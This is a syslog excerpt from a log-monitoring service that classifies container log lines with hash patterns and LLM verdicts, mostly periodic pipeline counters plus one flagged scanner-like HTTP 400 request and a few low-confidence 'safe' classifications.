Mar 20 05:25:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:15.218037 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T05:25:08.222494386Z 43.157.22.109 - - [20/Mar/2026:05:25:08 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15...
Mar 20 05:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:31.935318 [observer] Pipeline: processed=1957 pattern_hits=1923 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:31.935345 [observer] Patterns: hash=1923 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:01.959556 [observer] Pipeline: processed=1961 pattern_hits=1927 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:01.959581 [observer] Patterns: hash=1927 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:31.943855 [observer] Pipeline: processed=1963 pattern_hits=1929 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:31.943884 [observer] Patterns: hash=1929 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:01.960261 [observer] Pipeline: processed=1967 pattern_hits=1933 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:01.960836 [observer] Patterns: hash=1933 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:31.944279 [observer] Pipeline: processed=1969 pattern_hits=1935 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:31.944306 [observer] Patterns: hash=1935 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:01.996692 [observer] Pipeline: processed=1975 pattern_hits=1941 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:01.998378 [observer] Patterns: hash=1941 
prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:31.934940 [observer] Pipeline: processed=1977 pattern_hits=1943 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:31.934970 [observer] Patterns: hash=1943 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:01.958913 [observer] Pipeline: processed=1979 pattern_hits=1945 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:01.958942 [observer] Patterns: hash=1945 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:31.933581 [observer] Pipeline: processed=1983 pattern_hits=1949 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:31.933605 [observer] Patterns: hash=1949 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:01.958466 [observer] Pipeline: processed=1985 pattern_hits=1951 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:01.958501 [observer] Patterns: hash=1951 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:31.938569 [observer] Pipeline: processed=1989 pattern_hits=1955 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:31.938595 [observer] Patterns: hash=1955 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:01.952744 [observer] Pipeline: processed=1991 pattern_hits=1957 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:31:01 ip-172-26-12-110 observer[1565011]: 
2026/03/20 05:31:01.952781 [observer] Patterns: hash=1957 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:31.933872 [observer] Pipeline: processed=1995 pattern_hits=1961 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:31.933894 [observer] Patterns: hash=1961 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:01.940516 [observer] Pipeline: processed=1997 pattern_hits=1963 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:01.940554 [observer] Patterns: hash=1963 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:31.943709 [observer] Pipeline: processed=1999 pattern_hits=1965 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:31.943737 [observer] Patterns: hash=1965 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:01.960705 [observer] Pipeline: processed=2005 pattern_hits=1971 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:01.960759 [observer] Patterns: hash=1971 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:31.940875 [observer] Pipeline: processed=2007 pattern_hits=1973 llm_calls=34 llm_errors=0 learned=0 Mar 20 05:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:31.940902 [observer] Patterns: hash=1973 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34 Mar 20 05:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:01.955223 [observer] Pipeline: processed=2011 pattern_hits=1977 llm_calls=34 llm_errors=0 
learned=0
Mar 20 05:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:01.955285 [observer] Patterns: hash=1977 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:31.933888 [observer] Pipeline: processed=2013 pattern_hits=1979 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:31.934010 [observer] Patterns: hash=1979 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:34:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:49.322635 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.68 action=allow pattern_type=prefix
Mar 20 05:34:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:49.322683 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 05:34:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:56.986659 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 05:34:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:56.986696 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.874026 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.874067 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.937078 [observer] Pipeline: processed=2020 pattern_hits=1983 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.937106 [observer] Patterns: hash=1983 prefix=0 regex=0
contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:31.935648 [observer] Pipeline: processed=2022 pattern_hits=1985 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:31.935674 [observer] Patterns: hash=1985 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:01.940295 [observer] Pipeline: processed=2024 pattern_hits=1987 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:01.940322 [observer] Patterns: hash=1987 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:31.934233 [observer] Pipeline: processed=2028 pattern_hits=1991 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:31.934260 [observer] Patterns: hash=1991 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:01.957334 [observer] Pipeline: processed=2030 pattern_hits=1993 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:01.957434 [observer] Patterns: hash=1993 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:31.935343 [observer] Pipeline: processed=2034 pattern_hits=1997 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:31.935367 [observer] Patterns: hash=1997 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:01.947432 [observer] Pipeline: processed=2036 pattern_hits=1999 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
05:38:01.947468 [observer] Patterns: hash=1999 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:31.933614 [observer] Pipeline: processed=2042 pattern_hits=2005 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:31.933638 [observer] Patterns: hash=2005 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:01.999510 [observer] Pipeline: processed=2044 pattern_hits=2007 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:01.999741 [observer] Patterns: hash=2007 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:31.941782 [observer] Pipeline: processed=2046 pattern_hits=2009 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:31.941808 [observer] Patterns: hash=2009 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:01.936966 [observer] Pipeline: processed=2050 pattern_hits=2013 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:01.936994 [observer] Patterns: hash=2013 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:31.935613 [observer] Pipeline: processed=2052 pattern_hits=2015 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:31.935645 [observer] Patterns: hash=2015 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:01.959014 [observer] Pipeline: processed=2056 pattern_hits=2019 llm_calls=37 llm_errors=0 learned=0 Mar 
20 05:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:01.959142 [observer] Patterns: hash=2019 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:31.943457 [observer] Pipeline: processed=2058 pattern_hits=2021 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:31.943480 [observer] Patterns: hash=2021 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:01.969182 [observer] Pipeline: processed=2062 pattern_hits=2025 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:01.969224 [observer] Patterns: hash=2025 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:31.943292 [observer] Pipeline: processed=2064 pattern_hits=2027 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:31.943316 [observer] Patterns: hash=2027 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:01.989001 [observer] Pipeline: processed=2066 pattern_hits=2029 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:01.989209 [observer] Patterns: hash=2029 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:31.939303 [observer] Pipeline: processed=2072 pattern_hits=2035 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:31.939326 [observer] Patterns: hash=2035 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:01.944121 [observer] Pipeline: processed=2074 
pattern_hits=2037 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:01.944355 [observer] Patterns: hash=2037 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:31.936498 [observer] Pipeline: processed=2078 pattern_hits=2041 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:31.936521 [observer] Patterns: hash=2041 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:01.956066 [observer] Pipeline: processed=2080 pattern_hits=2043 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:01.956095 [observer] Patterns: hash=2043 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:31.935065 [observer] Pipeline: processed=2084 pattern_hits=2047 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:31.935094 [observer] Patterns: hash=2047 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:01.951291 [observer] Pipeline: processed=2086 pattern_hits=2049 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:01.951320 [observer] Patterns: hash=2049 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:31.951376 [observer] Pipeline: processed=2088 pattern_hits=2051 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:31.951399 [observer] Patterns: hash=2051 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:47:01 ip-172-26-12-110 observer[1565011]: 
2026/03/20 05:47:01.946701 [observer] Pipeline: processed=2092 pattern_hits=2055 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:01.946735 [observer] Patterns: hash=2055 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:31.939225 [observer] Pipeline: processed=2094 pattern_hits=2057 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:31.939248 [observer] Patterns: hash=2057 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:01.948817 [observer] Pipeline: processed=2098 pattern_hits=2061 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:01.948843 [observer] Patterns: hash=2061 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:31.933737 [observer] Pipeline: processed=2102 pattern_hits=2065 llm_calls=37 llm_errors=0 learned=0 Mar 20 05:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:31.933761 [observer] Patterns: hash=2065 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37 Mar 20 05:48:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:50.483014 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 05:48:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:50.483053 [analyzer] Source hint mismatch: LLM says "nginx-access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 05:48:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:57.535910 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 
05:48:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:57.535948 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+) Mar 20 05:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:01.943244 [observer] Pipeline: processed=2148 pattern_hits=2109 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:01.943270 [observer] Patterns: hash=2109 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:31.941403 [observer] Pipeline: processed=2152 pattern_hits=2113 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:31.941425 [observer] Patterns: hash=2113 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:01.950792 [observer] Pipeline: processed=2154 pattern_hits=2115 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:01.950825 [observer] Patterns: hash=2115 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:31.937139 [observer] Pipeline: processed=2158 pattern_hits=2119 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:31.937197 [observer] Patterns: hash=2119 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:01.944999 [observer] Pipeline: processed=2160 pattern_hits=2121 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:01.945769 [observer] Patterns: hash=2121 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:31.933994 [observer] Pipeline: processed=2164 pattern_hits=2125 
llm_calls=39 llm_errors=0 learned=0 Mar 20 05:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:31.934019 [observer] Patterns: hash=2125 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:01.952288 [observer] Pipeline: processed=2166 pattern_hits=2127 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:01.952327 [observer] Patterns: hash=2127 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:31.935870 [observer] Pipeline: processed=2170 pattern_hits=2131 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:31.935896 [observer] Patterns: hash=2131 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:01.958260 [observer] Pipeline: processed=2172 pattern_hits=2133 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:01.958427 [observer] Patterns: hash=2133 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:31.941630 [observer] Pipeline: processed=2176 pattern_hits=2137 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:31.941659 [observer] Patterns: hash=2137 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:01.942587 [observer] Pipeline: processed=2180 pattern_hits=2141 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:01.942617 [observer] Patterns: hash=2141 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 
05:54:31.933696 [observer] Pipeline: processed=2182 pattern_hits=2143 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:31.933720 [observer] Patterns: hash=2143 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:01.937552 [observer] Pipeline: processed=2186 pattern_hits=2147 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:01.937578 [observer] Patterns: hash=2147 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:31.944050 [observer] Pipeline: processed=2188 pattern_hits=2149 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:31.944078 [observer] Patterns: hash=2149 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:01.971047 [observer] Pipeline: processed=2192 pattern_hits=2153 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:01.972905 [observer] Patterns: hash=2153 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:31.943064 [observer] Pipeline: processed=2194 pattern_hits=2155 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:31.943091 [observer] Patterns: hash=2155 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:01.950601 [observer] Pipeline: processed=2196 pattern_hits=2157 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:01.950633 [observer] Patterns: hash=2157 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 
20 05:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:31.933890 [observer] Pipeline: processed=2200 pattern_hits=2161 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:31.933964 [observer] Patterns: hash=2161 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:01.946298 [observer] Pipeline: processed=2202 pattern_hits=2163 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:01.946335 [observer] Patterns: hash=2163 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:31.933786 [observer] Pipeline: processed=2208 pattern_hits=2169 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:31.933833 [observer] Patterns: hash=2169 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:01.950862 [observer] Pipeline: processed=2210 pattern_hits=2171 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:01.950893 [observer] Patterns: hash=2171 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:31.935038 [observer] Pipeline: processed=2214 pattern_hits=2175 llm_calls=39 llm_errors=0 learned=0 Mar 20 05:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:31.935064 [observer] Patterns: hash=2175 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39 Mar 20 05:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:43.872259 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 05:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:43.872303 
